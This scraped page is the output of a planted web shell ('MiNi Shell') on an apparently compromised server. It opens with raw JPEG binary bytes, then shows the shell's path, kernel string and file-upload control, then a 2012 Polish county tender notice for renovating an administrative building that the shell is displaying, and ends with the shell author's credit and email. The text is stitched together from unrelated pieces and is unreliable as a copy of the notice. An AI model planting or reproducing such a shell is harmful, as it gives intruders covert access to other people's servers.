JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120914/349134-N-2012.html

<p class="kh_header"><b>Wodzisław Śląski: Remont budynku administracyjnego przy ul. Bogumińskiej 2 w Wodzisławiu Śl.
-  III etap robót</b><br>
<b>Numer ogłoszenia: 349134 - 2012; data zamieszczenia: 14.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Wodzisławski - Starostwo Powiatowe w Wodzisławiu Śl. , ul. Bogumińska 2, 44-300 Wodzisław Śląski, woj. śląskie, tel. 032 4120930, faks 032 4120931.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiatwodzislawski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku administracyjnego przy ul. Bogumińskiej 2 w Wodzisławiu Śl.
-  III etap robót.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane w budynku Starostwa Powiatowego w Wodzisławiu Śl. w zakresie remontu klatki schodowej, montażu klimatyzacji i serwerowi. 
Roboty prowadzone będą w obiekcie czynnym. 
Roboty budowlane realizowane będą na podstawie pozwolenia na budowę wydanego przez Starostę Wodzisławskiego  objętego Decyzją nr 109/09 z dnia 16 lutego 2009r.
Zakres robót obejmuje: 
1) Roboty ogólnobudowlane:
a) roboty demontażowe: demontaż grzejników, demontaż okładzin ceramicznych, demontaż stolarki drzwiowej, demontaż balustrad schodowych, demontaż okna, skucia tynków,
b) roboty wykończeniowe: montaż stolarki drzwiowej EI30, wykonanie okładzin ceramicznych schodowych, montaż balustrad schodowych, montaż okna, roboty malarskie,
c) naprawa dachu po zamontowaniu jednostek zewnętrznych klimatyzacji,
d) wywóz i utylizacja materiałów z rozbiórki.
2) Roboty elektryczne: 
a) klatka schodowa: demontaż tablic rozdzielczych, montaż nowych tablic rozdzielczych, wymiana przewodów elektrycznych, montaż opraw oświetleniowych w tym oprawy oświetlenia podstawowego, nocnego, awaryjnego - ewakuacyjnego,
b) wykonanie instalacji siłowej klimatyzatorów,
c) wykonanie instalacji odgromowej dla jednostek zewnętrznych,
d) wykonanie instalacji przeciwporażeniowej,
e) wykonanie instalacji przeciwprzepięciowej,
f) pomiary elektryczne.
3) Roboty instalacyjne  w zakresie klimatyzacji:
a) wykonanie konstrukcji wsporczej  dla klimatyzatorów,
b) montaż 2 systemów klimatyzatorów na II piętrze z jednostkami wewnętrznymi oraz  jednostkami zewnętrznymi zlokalizowanymi  na dachu budynku,
c) montaż 2 systemów klimatyzatorów na III piętrze z jednostkami wewnętrznymi oraz jednostkami zewnętrznymi zlokalizowanymi na elewacji budynku,
d) próby szczelności.                                                                                         
4) Inne obowiązki wykonawcy:      
1) opracowanie planu BIOZ,
2) zorganizowanie zaplecza socjalnego dla swoich brygad roboczych wraz z jego likwidacją po zakończeniu robót,
3) opracowanie harmonogramu rzeczowo -finansowego.
4) dostarczenie Zamawiającemu przed podpisaniem umowy kosztorysu sporządzonego metodą  szczegółową, 
5) zabezpieczenie wyposażenia (meble, sprzęt biurowy itp.) pomieszczeń przed zapyleniem i zanieczyszczeniem, a w przypadku zabrudzenia pomieszczeń doprowadzenie ich do stanu w którym możliwe jest funkcjonowanie pracowników i przyjmowanie petentów.
Koszty prac ujętych w punkcie 4) pokrywa wykonawca bez ich wyodrębnienia w kosztorysie ofertowym.
Szczegółowy opis przedmiotu zamówienia określa dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót, a także przedmiary robót, stanowiące załączniki do Opisu przedmiotu zamówienia - Dział II SIWZ.
Zamawiający wymaga, aby wykonawca udzielił gwarancji jakości na przedmiot zamówienia na okres nie krótszy niż 36 miesięcy i nie dłuższy niż 60 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Remont budynku administracyjnego w zakresie obejmującym zakres zamówienia podstawowego, do wysokości 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.11.12.20-6, 45.26.25.00-6, 45.31.00.00-3, 45.31.23.11-0, 45.31.40.00-1, 45.31.43.20-0, 45.31.57.00-5, 45.33.12.20-4, 45.41.00.00-4, 45.42.11.60-3, 45.42.10.00-4, 45.43.21.00-5, 45.44.21.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Mając na uwadze przedmiot zamówienia warunek ten nie znajduje zastosowania w niniejszym postępowaniu (nie dotyczy)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykaże się wykonaniem w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 
a)	jednego zamówienia, którego przedmiotem było wykonanie robot ogólnobudowlanych 
o wartości co najmniej 120.000,00 zł,
b)	jednego zamówienia, którego przedmiotem było wykonanie instalacji elektrycznych o wartości 
co najmniej 190.00,00 zł,
c)	jednego zamówienia, którego przedmiotem było wykonanie robót instalacyjnych w zakresie montażu 
i uruchomienia klimatyzacji o wartości co najmniej 100.00,00 zł,                                                                                  
oraz załączy dokumenty potwierdzające, że wskazane roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np. referencje, protokół odbioru). 
W przypadku podmiotów ubiegających się wspólnie o udzielenie zamówienia powyższy warunek mogą spełnić łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykaże dysponowanie osobami zdolnymi 
do wykonania zamówienia, tj. co najmniej:
a) jedną osobą, która będzie pełniła obowiązki kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,
b) jedną osobą, która będzie pełniła obowiązki kierownika robót, posiadającą uprawnienia budowlane 
do kierowania robotami elektrycznymi,
c) jedną osobę, która będzie pełniła obowiązki kierownika robót posiadającą uprawnienia budowlane 
do kierowania robotami instalacyjnymi w zakresie robót wentylacyjnych;
wskazane osoby muszą posiadać aktualną przynależność do właściwej Okręgowej Izby Inżynierów Budownictwa.
W przypadku podmiotów ubiegających się wspólnie o udzielenie zamówienia powyższy warunek mogą spełnić łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek dotyczący sytuacji finansowej i ekonomicznej, jeżeli posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia, na sumę ubezpieczenia nie mniejszą niż 400.000,00 zł.
W przypadku podmiotów ubiegających się wspólnie o udzielenie zamówienia powyższy warunek musi spełnić jeden z podmiotów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- wypełniony Wykaz podstawowych materiałów równoważnych - zał. nr 5 do oferty wraz z dokumentami, określającymi parametry techniczne oferowanych materiałów równoważnych (np. certyfikaty, aprobaty techniczne, specyfikacje techniczne itp.), potwierdzającymi ich równoważność w stosunku do materiału dobranego przez projektanta</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wraz z ofertą wypełnioną na Formularzu oferty i podpisaną przez osoby upoważnione do reprezentowania wykonawcy należy również załączyć:
1) wykaz dokumentów stanowiących tajemnicę przedsiębiorstwa - zał. nr 6 do oferty (jeżeli Wykonawca nie zastrzega w ofercie tajemnicy przedsiębiorstwa nie jest wymagane dołączenie niniejszego załącznika);
2) kosztorys ofertowy sporządzony metodą kalkulacji uproszczonej,
3) pełnomocnictwo (upoważnienie) do reprezentowania wykonawcy w postępowaniu i/lub zawarcia umowy, jeżeli osoba reprezentująca wykonawcę w postępowaniu mającym na celu zawarcie umowy nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty w zakresie:
a) osób uczestniczących w wykonaniu zamówienia pod warunkiem, że osoby te będą spełniały wymagania określone w SIWZ, a wykonawca ze względu na okoliczności, których nie mógł przewidzieć w chwili zawarcia umowy, będzie zmuszony do zmiany tych osób;
b) części zamówienia (zakresu robót), którą wykonawca zamierzał zlecić podwykonawcy wykazując przedmiotowy zakres w ofercie pod warunkiem, że wykonawca będzie zmuszony do zmiany zakresu ze względu na okoliczności, których nie mógł przewidzieć w chwili składania oferty;
c) wprowadzenia podwykonawcy w sytuacji gdy wykonawca na etapie składania ofert zaoferował samodzielne wykonanie przedmiotu zamówienia, pod warunkiem, że wystąpią okoliczności, których wykonawca nie mógł przewidzieć w chwili składania oferty.
d) ustawowej stawki podatku VAT Zamawiający dopuszcza zmianę wynagrodzenia wykonawcy o wysokość zmiany w stawce podatku VAT;
2. Zamawiający dopuszcza zmianę wyrobów budowlanych w stosunku do wskazanych przez wykonawcę 
w treści oferty tylko na wyroby o parametrach lepszych niż wymienione w ofercie z zachowaniem cen jednostkowych określonych w kosztorysie ofertowym pod warunkiem, że wyroby te zostały wprowadzone do obrotu. Wykonawca w tym celu zobowiązany jest do przedłożenia stosownych dokumentów potwierdzających wprowadzenie zaproponowanych wyrobów budowlanych do obrotu wraz z dokumentami potwierdzającymi ich parametry techniczne np.: certyfikaty, aprobaty techniczne, specyfikacje techniczne itp. 
3. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty w zakresie terminu wykonania robót w przypadku wystąpienia okoliczności, niezależnych od wykonawcy, tj. z uwagi na sytuacje wynikające ze specyficznych okoliczności mające miejsce w siedzibie zamawiającego typu np: wizytacje, kontrole, brak możliwości opuszczenia biur  przeznaczonych do remontu przez pracowników starostwa.
4. W przypadku zaistnienia sytuacji, o której mowa w punkcie 1 i 2 wykonawca jest zobowiązany zwrócić się do zamawiającego z pisemnym wnioskiem o zmianę postanowień umowy, dodatkowo w przypadku zaistnienia sytuacji, o której mowa w punkcie 1, należy wskazać okoliczności, które miały wpływ                 na ich wystąpienie, niezwłocznie po ich zaistnieniu.
5. W przypadku zaistnienia okoliczności o których mowa w punkcie 3 zamawiający po negocjacjach  z wykonawcą dopuszcza możliwość przedłużenia terminu realizacji przedmiotu umowy o czas w którym wystąpiły utrudnienia w prowadzeniu robót budowlanych, a utrudnienia te zostaną odnotowane 
w dzienniku budowy oraz potwierdzone przez inspektora nadzoru.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatwodzislawski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych Starostwa Powiatowego ul. Pszowska 92a, 44-300 Wodzisław Śląski..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2012 godzina 11:00, miejsce: Kancelaria Starostwa Powiatowego w Wodzisławiu Śl. przy ul. Pszowskiej 92a.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarcia umowy ramowej ani nie ustanawia dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com